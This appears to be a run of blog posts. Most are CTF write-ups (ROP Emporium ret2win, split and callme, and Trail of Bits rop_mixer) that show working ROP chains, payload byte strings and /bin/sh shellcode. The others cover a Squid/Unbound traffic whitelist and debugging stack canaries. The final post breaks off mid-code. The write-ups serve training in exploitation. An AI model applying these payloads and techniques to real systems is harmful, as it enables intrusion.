$ r2 ./callme -qc ' "/R pop rdi;ret" '
  0x00401ab0                 5f  pop rdi
  0x00401ab1                 5e  pop rsi
  0x00401ab2                 5a  pop rdx
  0x00401ab3                 c3  ret

Using the bash one liner from the previous split writeup:

$ echo '0x00
0x00
0x00
0x00
0x00
0x00401ab0
0x00000001
0x00000002
0x00000003
0x00401850
0x00401ab0
0x00000001
0x00000002
0x00000003
0x00401870
0x00401ab0
0x00000001
0x00000002
0x00000003
0x00401810
0x00401ab0' |
         while read l;
         do
           printf "%016x" "$l" |
           sed -re 's/([0-9a-f]{2})/\\x\1/g' |
           tac -b -rs '\(\\x\|\s\)'
         done
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb0\x1a\x40\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x50\x18\x40\x00\x00\x00\x00\x00\xb0\x1a\x40\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x70\x18\x40\x00\x00\x00\x00\x00\xb0\x1a\x40\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x10\x18\x40\x00\x00\x00\x00\x00\xb0\x1a\x40\x00\x00\x00\x00\x00

I’ll expand on the bash code a bit because it is useful for the other ROP Emporium challenges as well.

The while read l loops over every line, putting it into variable l

echo 'one
two
three' | while read l; do echo $l; done
one
two
three

The printf removes 0x and adds zero padding to 64 bits e.g.

$ printf "%016x" 0x00401ab0
0000000000401ab0

The sed replaces every 2 digits with itself plus a leading \x

$ echo "01020304" | sed -re 's/([0-9a-f]{2})/\\x\1/g'
\x01\x02\x03\x04

The tac is opposite of cat, reverses the order of lines/characters

$ echo -n "\x01\x02\x03\x04" | tac -b -rs '\(\\x\|\s\)'
\x04\x03\x02\x01

And finally the echo -e converts "\xNN" into literal bytes

$ echo -e "\x61\x62\x63"
abc

So the final exploit looks like this

$ echo -e "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb0\x1a\x40\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x50\x18\x40\x00\x00\x00\x00\x00\xb0\x1a\x40\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x70\x18\x40\x00\x00\x00\x00\x00\xb0\x1a\x40\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x10\x18\x40\x00\x00\x00\x00\x00\xb0\x1a\x40\x00\x00\x00\x00\x00" | LD_LIBRARY_PATH=. ./callme
callme by ROP Emporium
64bits

Hope you read the instructions...
> ROPE{a_placeholder_32byte_flag!}

ROP Emporium CTF 2/7 split

Fri, 01 Feb 2019 19:36:20 +0000

This challenge uses a similar pwnme function as the previous ret2win challenge with the same offsets but a larger overflow (0x60 bytes).

$ perl -e 'print(("\x00" x 0x28) . "fedcba")' |
  gdb ./split --batch -ex run
split by ROP Emporium
...
Program received signal SIGSEGV, Segmentation fault.
0x0000616263646566 in ?? ()

Scanning through the symbols we see two interesting things.

$ r2 ./split -qc "is"
[Symbols]
Num Paddr      Vaddr      Bind     Type Size Name
...
039 0x00000807 0x00400807  LOCAL   FUNC   17 usefulFunction
...
066 0x00001060 0x00601060 GLOBAL    OBJ   26 usefulString

$ r2 split -qc "aa ; pdf @ sym.usefulFunction"
/ (fcn) sym.usefulFunction 17
|   sym.usefulFunction ();
|           0x00400807      push rbp
|           0x00400808      mov rbp, rsp
|           0x0040080b      mov edi, str.bin_ls ; "/bin/ls"
|           0x00400810      call sym.imp.system
|           0x00400815      nop
|           0x00400816      pop rbp
\           0x00400817      ret

$ r2 split -qc "aa ; ps @ obj.usefulString"
/bin/cat flag.txt

It would seem that combining these two things, calling system with "/bin/cat flag.txt", is the purpose of this challenge.

The way arguments are passed to functions on AMD64 Linux (called the sysv ABI), is via the following registers RDI, RSI, RDX, RCX, R8, R9, and then remaining arguments are passed on the stack. In our case we want obj.usefulString (0x00601060) to be in the RDI register before we jump to call system() (0x00400810).

Radare2 has a command for searching gadgets which is /R. By wrapping the whole command in double quotes we can search for multiple opcodes in the same gadget chain, in this case pop rdi followed by ret. (The single quotes on the outside are for the sake of Bash).

$ r2 ./split -qc ' "/R pop rdi;ret" '
  0x00400883                 5f  pop rdi
  0x00400884                 c3  ret

We now have all the ingredients for our ROP chain:

pop rdi (0x00400883)
obj.usefulString (0x00601060)
call sym.imp.system (0x00400810)

After the overflow we want our stack to look like this:

+--------------------+--------------------+
| rsp + 0x38         | 0x0000000000400810 | <-- 3.
| rsp + 0x30         | 0x0000000000601060 | <-- 2.
| rsp + 0x28         | 0x0000000000400883 | <-- 1.
| rsp + 0x20         | 0x0000000000000000 | <-- stored rbp
| rsp + 0x18         | 0x0000000000000000 | <-- end of buffer
| rsp + 0x10         | 0x0000000000000000 |
| rsp + 0x08         | 0x0000000000000000 |
| rsp + 0x00         | 0x0000000000000000 | <-- start of buffer
+--------------------+--------------------+

So after reting from pwnme(), the application will jump to 0x00400883 and execute pop rdi, the value poped from the stack will be 0x00601060 (usefulString), and the next ret will jump to 0x00400810 and execute call sym.imp.system.

AMD64 is a little endian platform so we need to swap the bytes round for each memory address in our ROP chain:

0x0000000000400810 => "\x83\x08\x40\x00\x00\x00\x00\x00"
0x0000000000601060 => "\x60\x10\x60\x00\x00\x00\x00\x00"
0x0000000000400883 => "\x10\x08\x40\x00\x00\x00\x00\x00"

Converting addresses manually gets tedious so here is a bash one liner

$ echo $(echo -n "$1" |
         sed -re 's/([0-9a-f]{2})/\\x\1/g' |
         tac -b -rs '\(\\x\|\s\)' -)

Here is the example in action, successfully printing the flag:

$ perl -e 'print(("\x00" x 0x28) .
                  "\x83\x08\x40\x00\x00\x00\x00\x00" .
                  "\x60\x10\x60\x00\x00\x00\x00\x00" .
                  "\x10\x08\x40\x00\x00\x00\x00\x00")' |
  ./split
split by ROP Emporium
...
> ROPE{a_placeholder_32byte_flag!}
Segmentation fault

ROP Emporium CTF 1/7 ret2win

Fri, 04 Jan 2019 19:36:20 +0000

ROP Emporium

Learn return-oriented programming through a series of challenges designed to teach ROP techniques in isolation, with minimal reverse-engineering and bug-hunting.

Disassemble main() to find it just prints some stuff and then calls pwnme().

$ r2 ./ret2win -qc "aa ; pdf @ sym.main"

There is a stack buffer overflow is in the pwnme() function. We can see there is a 0x20 byte stack buffer with 0x32 bytes fgetsed into it.

$ r2 ./ret2win -qc "aa ; pdf @ sym.pwnme"
|           ; var char *s @ rbp-0x20
|           0x004007b9      sub rsp, 0x20
|           0x004007bd      lea rax, [s]
...
|           0x004007f6      mov rdx, qword [obj.stdin]
|           0x004007fd      lea rax, [s]
|           0x00400801      mov esi, 0x32
|           0x00400806      mov rdi, rax
|           0x00400809      call sym.imp.fgets

That means our payload needs to be 0x20 bytes to fill the buffer then the next 8 bytes will overflow the stored rbp and the next 8 bytes will overflow the stored rip.

We can confirm this with GDB(1). We see that out "fedcba" is now the new value of the instruction pointer rip.

$ perl -e 'print(("\x00" x 0x28) . "fedcba")' |
  gdb ./ret2win --batch -ex run
ret2win by ROP Emporium
...
Program received signal SIGSEGV, Segmentation fault.
0x0000616263646566 in ?? ()

The stack after overflow looks like this, with 0x61626364 poped into rip and causing a segfault.

+--------------------+--------------------+
| rsp + 0x28         | 0x0000000061626364 | <-- stored rip
| rsp + 0x20         | 0x0000000000000000 | <-- stored rbp
| rsp + 0x18         | 0x0000000000000000 | <-- end of buffer
| rsp + 0x10         | 0x0000000000000000 |
| rsp + 0x08         | 0x0000000000000000 |
| rsp + 0x00         | 0x0000000000000000 | <-- start of buffer
+--------------------+--------------------+

A note on 64 bit addressing

AMD64 processors typically only support 48 bit addresses with the top 16 bits are sign extended. Keep this in mind when choosing fake values to put onto the stack, because trying to use a non-conforming value as a memory address will result in obscure hardware errors which GDB can’t help with.

e.g. here the MMU couldn’t process 0x6162636465666768 and GDB still sees the old (and perfectly fine) value of 0x0000000000400810 in the rip register, which will be confusing if you’re not aware of this particular quirk.

$ perl -e 'print(("\x00" x 0x28) . "hgfedcba")' |
  gdb ./ret2win --batch -ex run
ret2win by ROP Emporium
...
Program received signal SIGSEGV, Segmentation fault.
0x0000000000400810 in pwnme ()

Now that we have control of rip the next step is to figure out what address to put in there and get the application to jmp to.

Just scanning through symbols we see an interesting function with the same name as the challenge.

$ r2 ./ret2win -qc "is"
[Symbols]
Num Paddr      Vaddr      Bind     Type Size Name
...
039 0x00000811 0x00400811  LOCAL   FUNC   32 ret2win
...

It simply spawns a shell and does cat flag.txt which is exactly what we want.

$ r2 ./ret2win -qc "aa ; pdf @ sym.ret2win"
/ (fcn) sym.ret2win 32
|   sym.ret2win ();
|           0x00400811      push rbp
|           0x00400812      mov rbp, rsp
|           0x00400815      mov edi, str.Thank_you__Here_s_your_flag:
|           0x0040081a      mov eax, 0
|           0x0040081f      call sym.imp.printf
|           0x00400824      mov edi, str.bin_cat_flag.txt ; "/bin/cat flag.txt"
|           0x00400829      call sym.imp.system

So replacing our test value (0x0000616263646566) with the address of ret2win() (0x00400811) will cause the application to jump to ret2win() and print out the flag. Since AMD64 is a little endian platform though, we need to write the bytes backwards, so 0x00400811 becomes "\x11\x08\x40".

$ perl -e 'print(("\x00" x 0x28) . "\x11\x08\x40")' | ./ret2win
ret2win by ROP Emporium
...
> Thank you! Here's your flag:ROPE{a_placeholder_32byte_flag!}

Whitelisting http/https traffic on Linux

Fri, 02 Mar 2018 19:36:20 +0000

Given a network interface I want to restrict any http(s) traffic going through it to a limited list of domains. An additional constraint is that I do not want any specialised client configuration. Such a thing is possible through a mitm capable http proxy server (Squid), a DNS server (Unbound) and some firewall rules (iptables). The iptables part is what makes this post specific to Linux.

My motivation for doing this came form running tcpdump and seeing how much crap my Android phone is spewing out over the internet. It would be nice to have a WiFi access point that will transparently proxy only connections I whitelist beforehand.

Setup

For testing we’ll just use a bridge with network namespaces. When we are ready to deploy we can change the interface to a real wlan or eth device.

brctl addbr br-squid
ifconfig br-squid 192.168.50.1

Don’t forget to enable ip forwarding or none of this will work.

echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

firejail --private --net=br-squid -- curl http://google.com -o /dev/null
curl: (6) Couldn't resolve host 'google.com'

We’ll ignore DNS by allowing all DNS requests and forward them to Google DNS with iptables. Later we will use a local DNS server to do whitelisting.

iptables -t nat -A POSTROUTING -s 192.168.50.0/24 -p udp -d 8.8.8.8 \
  --dport 53 -o eno1 -j MASQUERADE
iptables -I FORWARD -i eno1 -o br-squid -m state \
  --state RELATED,ESTABLISHED -j ACCEPT

firejail --private --net=br-squid --dns=8.8.8.8 -- \
  curl --connect-timeout 10 http://google.com -o /dev/null
% Total    % Received % Xferd  Average Speed   Time    Time     Time Current
                               Dload  Upload   Total   Spent    Left Speed
0     0    0     0    0     0      0      0 --:--:--  0:00:10 --:--:--     0
curl: (28) Connection timed out after 10000 milliseconds

Squid http intercept

Squid supports transparent proxying under the name of “intercept”.

Here is a minimal squid.conf file:

acl http_whitelist dstdomain .google.com
acl http_whitelist dstdomain .google.co.uk

http_access allow http_whitelist
acl client_src src 192.168.50.0/24
http_access allow client_src
http_access deny all

http_port 192.168.50.1:3128 intercept

The intercept keyword on http_port is important to enable Squid to handle http requests redirected by iptables from a client oblivious to the presence of the proxy. In this configuration we allow 2 Google related domains and block everything else. Note that it is also important to whitelist the source address that our requests are originating from (the address of our network bridge).

Firewall rule for doing the redirect looks like this

iptables -t nat -A PREROUTING -i br-squid -p tcp --dport 80 -j DNAT --to \
  192.168.50.1:3128

Start squid like this

squid -f ./squid.conf -N -d1

Where -f is the path to local config file, -N is no daemonize and -d1 is setting the debug level.

firejail --private --net=br-squid --dns=8.8.8.8 -- \
   curl --connect-timeout 10 http://google.com -o /dev/null
% Total    % Received % Xferd  Average Speed   Time    Time     Time
Current
                                 Dload  Upload   Total   Spent    Left
Speed
100   271  100   271    0     0    271      0  0:00:01 --:--:--  0:00:01

Squid https intercept

SSL is more tricky because the hostname the client is trying to connect to is not readily available like in plain http. Squid needs to start an SSL session with the server and parse the hostname from the returned certificate or parse the hostname from the SNI extension from the client. Squid calls this hostname identification step peek. After that, if the hostname matches our whitelist we want to do what Squid calls splice the connection, which is the blindly forward encrypted packets as if the proxy was not there. For all other hostnames we want to terminate the connection. Squid also has a mitm mode called bump but that’s outside the scope of this post.

Here are additional ssl specific lines to add to our squid.conf file. Note that we need a special port for ssl intercept (https_port) and the acl keywords are different (ssl::server_name).

https_port 192.168.50.1:3129 intercept ssl-bump cert=./myCA.pem

acl https_whitelist ssl::server_name .google.com
acl https_whitelist ssl::server_name .google.co.uk

ssl_bump splice https_whitelist
ssl_bump peek all
ssl_bump terminate all

Note also that the order of the commands splice, peek and terminate is important because intercept is a multi stage process and Squid will match the first appropriate command and ignore the rest for each stage. In our case we want to splice any connection that Squid can determine is allowed by our whitelist acl. If Squid cannot make this decision yet then the next command to try is peek to gather the necessary information. If peeking is done and the connection is not spliced because of the acl then the only option left is terminate.

Even though we are not doing mitm, Squid won’t start ssl intercept without a self signed certificate, this is how we can make one.

openssl req -new -newkey rsa:2048 -sha256 -days 365 -nodes -x509 \
      -extensions v3_ca -keyout myCA.pem  -out myCA.pem

Redirect port 443 traffic to Squid like this

iptables -t nat -A PREROUTING -i br-squid -p tcp --dport 443 -j DNAT --to \
  192.168.50.1:3129

For testing we can see that https://google.com (whitelisted) works and https://bing.com (not whitelisted) fails.

firejail --private --net=br-squid --dns=8.8.8.8 -- \
  curl --connect-timeout 10 https://google.com -o /dev/null
% Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                               Dload  Upload   Total   Spent    Left  Speed
100   222  100   222    0     0    905      0 --:--:-- --:--:-- --:--:--   902

firejail --private --net=br-squid --dns=8.8.8.8 -- \
  curl --connect-timeout 10 https://bing.com -o /dev/null
% Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
curl: (35) Unknown SSL protocol error in connection to bing.com:443

You may encounter failures on whitelisted domains with lines like the following in Squid log

SECURITY ALERT: Host header forgery detected on local=216.58.198.110:443 remote=192.168.50.41:40534 FD 13 flags=33 (local IP does not match any domain IP)

This happens because the client does a DNS lookup and Squid also does an independent DNS lookup. Different DNS servers, may return different addresses on different queries. The same DNS system like 8.8.8.8 may also return different addresses on different queries only because of load balancing. We can fix this problem by redirecting the client and Squid through the same local caching DNS server which is our next topic.

DNS

We can use the DNS server Unbound to do DNS based whitelisting and fix our SSL errors above.

A minimal Unbound config looks like this:

server:
  interface: 192.168.50.1
  access-control: 192.168.50.1/24 allow

Even though we bind to a non-localhost address, Unbound will reject requests from non-localhost clients by default.

debug: refused query from ip4 192.168.50.67 port 50214

So that’s why we need the access control line.

Remove the old DNS firewall rule with iptables -D and add a new one redirecting all DNS requests on our target interface to Unbound.

iptables -t nat -D POSTROUTING -s 192.168.50.0/24 -d 8.8.8.8/32 -o eno1 -p udp -m udp \
  --dport 53 -j MASQUERADE
iptables -t nat -A PREROUTING -i br-squid -p udp --dport 53 -j DNAT --to \
  192.168.50.1:53

Change the dns_namesevers line in squid.conf to use Unbound to avoid host header forgery errors discussed above

dns_nameservers 192.168.50.1

Run unbound and check it works

unbound -d -c ./unbound.conf

firejail --private --net=br-squid -- \
  curl --connect-timeout 10 https://bing.com -o /dev/null
% Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                               Dload  Upload   Total   Spent    Left  Speed
0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
curl: (35) Unknown SSL protocol error in connection to bing.com:443

firejail --private --net=br-squid -- \
  curl --connect-timeout 10 https://google.com -o /dev/null
% Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   272  100   272    0     0    479      0 --:--:-- --:--:-- --:--:--   479

By default Unbound serves all DNS requests because that’s what most people want in a DNS server. To make Unbound behave like a whitelist, we refuse lookups for all domains and then set our whitelisted ones to transparent. The order of the lines does not matter, Unbound will match the most specific line (so "google.com" transparent will win over "." refuse).

local-zone: "." refuse
local-zone: "google.com" transparent
local-zone: "google.co.uk" transparent

When we test we can see the DNS lookup for our non-whitelisted domain bing.com is instantly rejected.

firejail --private --net=br-squid -- \
  curl --connect-timeout 10 https://bing.com -o /dev/null
% Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
curl: (6) Could not resolve host: bing.com

firejail --private --net=br-squid -- \
  curl --connect-timeout 10 https://google.com -o /dev/null
% Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   272  100   272    0     0   1066      0 --:--:-- --:--:-- --:--:--  1062

Maintaining a different whitelist for Squid and Unbound may seem excessive and cumbersome. The value of Squid whitelisting is to ensure clients cannot connect directly to IP addresses and avoid the Unbound whitelist. The value of the Unbound whitelist is to ensure clients cannot tunnel their traffic through unrestricted DNS lookups and avoid the Squid whitelist.

If your threat model does not merit having 2 whitelists then DNS tunnelling is less likely than clients attempted to connect to hardcoded IP addresses so the Squid whitelist is more valuable.

Debugging Stack Canaries on x86 Linux

Fri, 02 Feb 2018 19:36:20 +0000

On x86 Linux, stack canaries are kept in thread local storage and accessed through the gs segment register (e.g. gs:0x14). If you have ever found yourself in a debugging session and wondering how to print out that value then this is the post for you.

Thread local storage is initialized by the set_thread_area(2) systemcall which takes a user_desc struct as its only argument.

struct user_desc {
    unsigned int  entry_number;
    unsigned long base_addr;
    unsigned int  limit;
    unsigned int  seg_32bit:1;
    unsigned int  contents:2;
    unsigned int  read_exec_only:1;
    unsigned int  limit_in_pages:1;
    unsigned int  seg_not_present:1;
    unsigned int  useable:1;
};

The second field, base_addr is the address of a data structure which will hold our stack canary (among other things).

One way to find the canary value is to catch the set_thread_area syscall and save the base_addr. After that, base_addr + 0x14 will be where the canary is.

Here is an exmple program:

#include <stdio.h>

void a()
{
  printf("Hello, world!\n");
}

int main()
{
  a();
}

We can compile it with -fstack-protector-all to ensure that every function contains a canary, even our trivially safe a() function. And -m32 to ensure it is 32 bit.

†  gcc -m32 -fstack-protector-all canary-test.c
†  r2 -d a.out
[0xf77bf990]> dcs set_thread_area
child stopped with signal 133
--> SN 0xf77bf8fd syscall 243 set_thread_area (0xffffffda 0xffa20d90)
[0xf77bf8fd]>
[0xf77bf8fd]> pd -18
       ,==< 0xf77bf8b4      7f00           jg 0xf77bf8b6
       `--> 0xf77bf8b6      0000           add byte [eax], al
        |   0xf77bf8b8      e83e860100     call 0xf77d7efb
        |   0xf77bf8bd      83c410         add esp, 0x10
        `=< 0xf77bf8c0      ebe5           jmp 0xf77bf8a7
            0xf77bf8c2      8b4004         mov eax, dword [eax + 4]    ; [0x4:4]=-1 ; 4
            0xf77bf8c5      89e3           mov ebx, esp
            0xf77bf8c7      898660080000   mov dword [esi + 0x860], eax
            0xf77bf8cd      8912           mov dword [edx], edx
            0xf77bf8cf      895208         mov dword [edx + 8], edx
            0xf77bf8d2      8b86e8feffff   mov eax, dword [esi - 0x118]
            0xf77bf8d8      c70424ffffff.  mov dword [esp], 0xffffffff
            0xf77bf8df      894210         mov dword [edx + 0x10], eax
            0xf77bf8e2      89542404       mov dword [esp + 4], edx
            0xf77bf8e6      b8f3000000     mov eax, 0xf3
            0xf77bf8eb      c7442408ffff.  mov dword [esp + 8], 0xfffff
            0xf77bf8f3      c744240c5100.  mov dword [esp + 0xc], 0x51
            0xf77bf8fb      cd80           int 0x80

0xf77bf8fb      cd80           int 0x80 This is the syscall invokation.

0xf77bf8e6      b8f3000000     mov eax, 0xf3 This is the syscall number, 0xf3 (243) which is set_thread_area (check `/usr/include/asm/unistd_32.h`).

0xf77bf8c5      89e3           mov ebx, esp This is the user desc struct, it is stored on the stack.

0xf77bf8e2      89542404       mov dword [esp + 4], edx This is where the base_addr field is set (user_desc+4).

So printing out edx should give us the base_addr we want.

[0xf77bf8fd]> dr edx
0xf75f5700

So user_addr is 0xf75f5700.

Next we break on a function (in this case a()), and single step until the cookie is in a register we can print out (eax).

[0xf77bf8fd]> db sym.a
[0xf77bf8fd]> c
Selecting and continuing: 3685
hit breakpoint at: 804843b
[0x0804843b]> ds ; pd 1 @ `dr eip`
|           0x0804843b b    55             push ebp
[0x0804843b]> ds ; pd 1 @ `dr eip`
|           0x0804843c      89e5           mov ebp, esp
[0x0804843b]> ds ; pd 1 @ `dr eip`
|           0x0804843e      83ec18         sub esp, 0x18
[0x0804843b]> ds ; pd 1 @ `dr eip`
|           0x08048441      65a114000000   mov eax, dword gs:[0x14]    ; [0x14:4]=-1 ; 20
[0x0804843b]> ds ; pd 1 @ `dr eip`
|           0x08048447      8945f4         mov dword [local_ch], eax
[0x0804843b]> dr eax
0xffa9c800

If we add 0x14 to the base_addr we noted earlier do we get the same cookie?

[0x0804843b]> pv4 @ 0xf75f5700 + 0x14
0xffa9c800

Yes.

The same process can be done with gdb

(gdb) catch syscall set_thread_area
Catchpoint 1 (syscall 'set_thread_area' [243])
(gdb) r
Starting program: a.out

Catchpoint 1 (call to syscall set_thread_area), 0xf7fda8fd in ?? ()
...
(gdb) disassemble 0xf7fda8c5,0xf7fda8fd
Dump of assembler code from 0xf7fda8c5 to 0xf7fda8fd:
   0xf7fda8c5:  mov    %esp,%ebx
   0xf7fda8c7:  mov    %eax,0x860(%esi)
   0xf7fda8cd:  mov    %edx,(%edx)
   0xf7fda8cf:  mov    %edx,0x8(%edx)
   0xf7fda8d2:  mov    -0x118(%esi),%eax
   0xf7fda8d8:  movl   $0xffffffff,(%esp)
   0xf7fda8df:  mov    %eax,0x10(%edx)
   0xf7fda8e2:  mov    %edx,0x4(%esp)
   0xf7fda8e6:  mov    $0xf3,%eax
   0xf7fda8eb:  movl   $0xfffff,0x8(%esp)
   0xf7fda8f3:  movl   $0x51,0xc(%esp)
   0xf7fda8fb:  int    $0x80
(gdb) p/x $edx
$1 = 0xf7fd5440
(gdb) b a
Breakpoint 2 at 0x8048441
(gdb) c
Continuing.

Breakpoint 2, 0x08048441 in a ()
(gdb) disassemble
Dump of assembler code for function a:
   0x0804843b <+0>:     push   %ebp
   0x0804843c <+1>:     mov    %esp,%ebp
   0x0804843e <+3>:     sub    $0x18,%esp
=> 0x08048441 <+6>:     mov    %gs:0x14,%eax
   0x08048447 <+12>:    mov    %eax,-0xc(%ebp)
   0x0804844a <+15>:    xor    %eax,%eax
   0x0804844c <+17>:    sub    $0xc,%esp
   0x0804844f <+20>:    push   $0x8048530
   0x08048454 <+25>:    call   0x8048310 <puts@plt>
   0x08048459 <+30>:    add    $0x10,%esp
   0x0804845c <+33>:    nop
   0x0804845d <+34>:    mov    -0xc(%ebp),%eax
   0x08048460 <+37>:    xor    %gs:0x14,%eax
   0x08048467 <+44>:    je     0x804846e <a+51>
   0x08048469 <+46>:    call   0x8048300 <__stack_chk_fail@plt>
   0x0804846e <+51>:    leave
   0x0804846f <+52>:    ret
End of assembler dump.
(gdb) si
0x08048447 in a ()
(gdb) p/x $eax
$2 = 0x9b291e00
(gdb) p/x *(0xf7fd5440 + 0x14)
$4 = 0x9b291e00

Trail of Bits CTF 5/5 Rop Mixer

Fri, 05 Jan 2018 19:36:20 +0000

Trail of Bits released a number of CTF challeleges on Github.

This post is about the rop_mixer binary exploitation challenge.

The rop_mixer challenge is found in the ctf/exploits/binary2_workshop/rop_mixer/ directory. It contains only a single binary (rop_mixer), a shell script to make it available over the network with socat and no source code.

This one is different from the other challenges in that it is not a vulnerable application; it doesn’t have any supposed purpose besides being exploited.

|           0x0804884c      b83ca00408     mov eax, loc.NASM_BEGIN
...
|           0x0804886f      c74424080010.  mov dword [local_8h], 0x1000
...
|           0x0804887b      89442404       mov dword [local_4h], eax
|           0x0804887f      c70424000000.  mov dword [esp], 0
|           0x08048886      e8e5fbffff     call sym.imp.read
|           0x0804888b      8d44242c       lea eax, [local_2ch]
|           0x0804888f      89c4           mov esp, eax
\           0x08048891      c3             ret

Up to 0x1000 bytes are read from stdin into a buffer and then this buffer is swapped with esp. So this new buffer is effectively our new stack and we can feed our rop chain into it directly without fiddling with buffer overflows and offsets. It appears that the rest of the code only exists to provide rop gadgets. I’m not sure if the gadgets are enough to get a shell, I spent some time trying but couldn’t figure it out. Fortunately, this buffer holding our rop chain is also executable.

[0x08048530]> is | grep NASM_BEGIN
vaddr=0x0804a03c paddr=0x0000103c ord=121 fwd=NONE sz=0 bind=GLOBAL type=NOTYPE name=NASM_BEGIN
[0x08048530]> iS | grep 0x0804a03c
idx=25 vaddr=0x0804a03c paddr=0x0000103c sz=784 vsz=784 perm=--rwx name=.ROP_MIX

So the strategy I went with is using the rop chain to redirect execution to the rwx buffer.

$gadget_call_eax = addr_to_str 0x080485df
#0x080485df               ffd0  call eax

However, if we do that, esp and eip will be pointing to the same address and bad things will happen, the return address from this gadget (0x080485e1) will be executed as code (e185 loope 0xfff36d93, 0408 add al, 8).

So the first thing to do is move the stack pointer a little bit further into the buffer and put the call eax gadget there.

$gadget_add_esp = addr_to_str 0x0804890c
#0x08048909             83c41c  add esp, 0x1c
#0x0804890c                 5b  pop ebx
#0x0804890d                 5e  pop esi
#0x0804890e                 5f  pop edi
#0x0804890f                 5d  pop ebp
#0x08048910                 c3  ret

Unfortunately 0x1c bytes does not seem to be enough space for my shellcode, so lets add code to jmp over the gadget address (which is clobbered by the return address from call eax at this point) and fill the gap with nops. So far the exploit string looks like this:

$shell_jmp_4 = enc "\xeb\x02"

e = $gadget_add_esp +
  $shell_nop + $shell_nop + $shell_nop +
  $shell_nop + $shell_nop + $shell_nop +
  $shell_nop + $shell_nop + $shell_nop + $shell_nop +
  $shell_nop + $shell_nop + $shell_nop + $shell_nop +
  $shell_jmp_4 +
  $gadget_call_eax

We can use rasm2 (part of Radare2) to assemble arbitrary instructions:

†  rasm2 -ix86 'jmp 4'
eb02

Using non-ascii characters in strings causes Ruby’s do-what-i-mean semantics to go a little wrong (Ruby is being reasonable, we are the ones trying to do something weird). To deal with that we will run our shell code through an enc function.

def enc s
  #incompatible character encodings: ASCII-8BIT and UTF-8(Encoding::CompatibilityError)
  s.force_encoding(Encoding::ASCII_8BIT)
end

From this point on we can execute whatever shellcode we want. To evecve a shell we need:

eax = 0x0b
ebx = "/bin/sh"
ecx = 0
edx = 0

and then invoke a system call with int 0x80.

The placement of the “/bin/sh” string complicates things. One thing we can do is place it inline with the shell code and then jmp over it during execution. It is not possible to mov the value of eip into a general purpose register though. One way to get the value is to call and immediately return, leaving eip on the stack.

mov edi, 0x08048910
call edi
mov ebx, esp - 4
jmp 0x0a
"/bin/bash"
add ebx, 9

We can add them to our exploit string like this:

$shell_mov_edi_0xbf10890408 = enc "\xbf\x10\x89\x04\x08"
$shell_call_edi = enc "\xff\xd7"
$shell_mov_ebx_esp_4 = enc "\x8b\x9c\x24\xfc\xff\xff\xff"
$shell_jmp_0xa = enc "\xeb\x08"
$shell_add_esp_0x100 = enc "\x81\xc4\x00\x01\x00\x00"
$shell_bin_sh = enc "/bin/sh\x00"
$shell_add_ebx_9 = enc "\x83\xc3\x09"

And what’s left is setting the remaining registers with immediate values and invoking the syscall.

mov eax, 0xb
xor ecx, ecx
xor edx, edx
int 0x80

$shell_mov_eax_0xb = enc "\xb8\x0b\x00\x00\x00"
$shell_xor_ecx_ecx = enc "\x31\xc9"
$shell_xor_edx_edx = enc "\x31\xd2"
$shell_int_0x80 = enc "\xcd\x80"

So our complete exploit string looks like this:

e = $gadget_add_esp +
  $shell_nop + $shell_nop + $shell_nop +
  $shell_nop + $shell_nop + $shell_nop +
  $shell_nop + $shell_nop + $shell_nop + $shell_nop +
  $shell_nop + $shell_nop + $shell_nop + $shell_nop +
  $shell_jmp_4 +
  $gadget_call_eax +
  $shell_add_esp_0x100 +
  $shell_mov_edi_0xbf10890408 +
  $shell_call_edi +
  $shell_mov_ebx_esp_4 +
  $shell_jmp_0xa +
  $shell_bin_sh +
  $shell_add_ebx_9 +
  $shell_mov_eax_0xb +
  $shell_xor_ecx_ecx +
  $shell_xor_edx_edx +
  $shell_int_0x80

"\f\x89\x04\b\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xEB\x02\xDF\x85\x04\b\x81\xC4\x00\x01\x00\x00\xBF\x10\x89\x04\b\xFF\xD7\x8B\x9C$\xFC\xFF\xFF\xFF\xEB\b/bin/sh\x00\x83\xC3\t\xB8\v\x00\x00\x001\xC91\xD2\xCD\x80"

We can spawn the binary locally (useful for debugging) or netcat to connect remotely using Ruby’s PTY module part of the standard library.

require 'pty'

def xspawn cmd
  master, slave = PTY.open
  read, write = IO.pipe
  pid = spawn(cmd, :in=>read, :out=>slave)
  read.close
  slave.close
